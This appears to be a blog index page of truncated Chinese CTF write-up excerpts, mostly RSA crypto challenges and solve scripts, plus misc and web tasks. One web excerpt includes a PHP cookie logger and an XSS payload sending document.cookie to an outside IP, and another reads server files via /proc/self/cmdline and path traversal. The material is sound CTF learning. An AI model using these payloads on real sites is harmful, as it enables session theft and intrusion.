HvAng's Nests

写在最前面，原题杯与咸鱼CTF 网鼎杯2024青龙组 CRYPTO001 from Crypto.Util.number import *from secret import flagp = getPrime(512)q = getPrime(512)n = p * qd = getPrime(299)e = inverse(d,(p-1)*(q-1))m = bytes_to_long(flag)c = pow(m,e,n)hint1 = p >> (512-70)hint2 = q >> (512-70)print(f"n = {n}")print(f"e = {e}")print(f"c = {c}")print(f"hint1 = {hint1}")print(f"hint2 = {hint2}")n = 123789043095302886784777 ...

Crypto 给两个比较完善的CRYPTO方向的wp https://blog.csdn.net/weixin_52640415/article/details/141436804 https://www.cnblogs.com/naby/p/18466255 有一题临时下了，不知道什么情况，三题没出，质量还是非常不错的 现代密码学入门指北 from Crypto.Util.number import *print(long_to_bytes(pow(c, inverse(e, (p-1)*(q-1)), n)))Signinfrom Crypto.Util.number import*from secret import flagm = bytes_to_long(flag)p = getPrime(1024)q = getPrime(1024)n = p*qe = 65537c = pow(m,e,n)pq = (p-1)*(q-2)qp = (q-1)*(p-2)p_q = p + qprint(f"{c = }")print(f&qu ...

密码全题目链接 当初为了以后拷打学弟，全下了 Crypto 😢 雨霖铃 from Crypto.Util.number import *from os import getenvflag = getenv("FLAG")def chal(): e = 65537 phi = e while GCD(e, phi) != 1: p = getPrime(512) q = getPrime(512) n = p * q phi = (p - 1) * (q - 1) d = pow(e, -1, phi) print(f"Alice -> Bob :The public key {{'n':{hex(n)},'e':{hex(e)}}}") mess = b"I l0ve you---Bob" m = ...

Web 🦴 babyHTTP 考点GET POST Cookie，HTTP基础知识 🙋🏼‍♀️ PHPinfo 考点phpinfo() http://111.229.23.244:50002/phpinfo.php ctrl+f，搜索cnss 🥇 我得再快点 利用正则表达式获取前端数据的Key的值，进行md5加密，再Python访问payload import requestsimport refrom hashlib import md5url = 'http://152.136.11.155:10103'# 循环获取页面内容while True: response = requests.get(url, timeout=1) # 使用正则表达式匹配Key后面的字符串 pattern = r'Key : (\w+)' # 搜索匹配的字符串 match = re.search(pattern, response.text) s = match.group(1) str = md5(s.e ...

也是代表Sloth参加了，学长们没来，去了三个web手，我可以算半个密码手？两个web学弟干瞪眼…… 还是太菜了，QWQ，最后放榜，好像排到了98…… 爆零了这边，QWQ 明面上去打比赛，实际上去银川旅游(bushi) 初始谜题1 题目 from sympy import Mod, Integerfrom sympy.core.numbers import mod_inverse# 模数N_HEX = "FFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFF7203DF6B21C6052B53BBF40939D54123"MODULUS = Integer(int(N_HEX, 16))MSG_PREFIX = "CryptoCup message:"# 加密函数def encrypt_message(message, key): # 添加前缀 message_with_prefix = MSG_PREFIX + message message_bytes = message_with_prefix.encod ...

Sloth战队 Rank: 60/588 下面贴我的wp Web Lyrics For You 借鉴https://www.cjxol.com/posts/sekaictf-2022-writeup/ /proc/self/cmdline，得到python3-u/usr/etc/app/app.py ../../app/app.py import osimport randomfrom config.secret_key import secret_codefrom flask import Flask, make_response, request, render_templatefrom cookie import set_cookie, cookie_check, get_cookieimport pickleapp = Flask(__name__)app.secret_key = random.randbytes(16)class UserData: def __init__(self, username): self.username = usern ...

CHECKIN 8.24 一眼评论区 Crypto EZsquares from Crypto.Util.number import *from gmpy2 import *from secret import flagp=getPrime(512)q=getPrime(512)n0=p**2+q**2print('n0 =',n0)e=65537n=p*qm=bytes_to_long(flag)c=pow(m,e,n)print('c =',c)# n0 = 1925737445386391308458687270140759676695136677633159341618496205316835366963761383033206819227820030880945397242381091164164562944724610756685680886882872098988509850246324632519843238887652499502695950456484351920479909405938170869183992124 ...

9号下午(三小时)结束的，第四届山石CTF训练营结营(招新)赛 Misc 签到 公众号 ayyctf{W3lc0me_CTFers_7hIs_1s_yOur_fI4g} play4fun 二进制8位一组>base64 ayyctf{c0de_1s_funnn!!!} dog 明显是宽高不对，根据CRC值修复，直接利用自动化工具(懒了) python Deformed-Image-Restorer.py -i dog.png 自动修复 timestamp bandzip直接打开，对应flag头ayyctf，时间正好对上了，直接提 s = [97, 121, 121, 99, 116, 102, 123, 52, 49, 101, 49, 45, 98, 101, 99, 54, 45, 101, 102, 97, 49, 57, 125]for i in s: print(chr(i), end='') ayyctf{41e1-bec6-efa19} 看见公众号说给的那个tx ...

TFCCTF https://ctf.thefewchosen.com Web GREETINGS 一开始感觉可以xss，因为body标签可以用 <body onload=alert(`ls`);> 然后，在vps上放置一个xss.php <?php$cookie = $_GET['cookie'];$log = fopen("cookie.txt", "a");fwrite($log, $cookie . "\n");fclose($log);?> <body onload="window.location.href='http://8.138.168.65/xss.php?cookie='+document.cookie"> 一试，没鬼用，莫得反应，那就不是xss喽 群里的师傅做出来了，Orz，是pug ssti，一开始也注意到了X-Powered-By: Express，Express是node.js的Web框架的一种，而Express框架 ...

比赛网址 https://deadsec.ctf.ae/ Misc Welcome Mic check 简单，写个脚本交互100次就行了 from pwn import *p = remote('ip', port)for i in range(100): s = p.recvline() print(s) r = s[12:13+i] print(r) p.sendlineafter(b'submit test words > ', r)p.interactive() MAN in the middle 可以看到只有上下两个波形，二进制？最后那一段可以忽略不看 但是数据量好大，手动提不现实 010查看16进制，发现FF 7F*44，算一段，01 80*44也算作一段 前者为1，后者为0，解不出来，尝试01为1，10为0 from Crypto.Util.number import *with open("MIM.MP3", 'rb')as f: a ...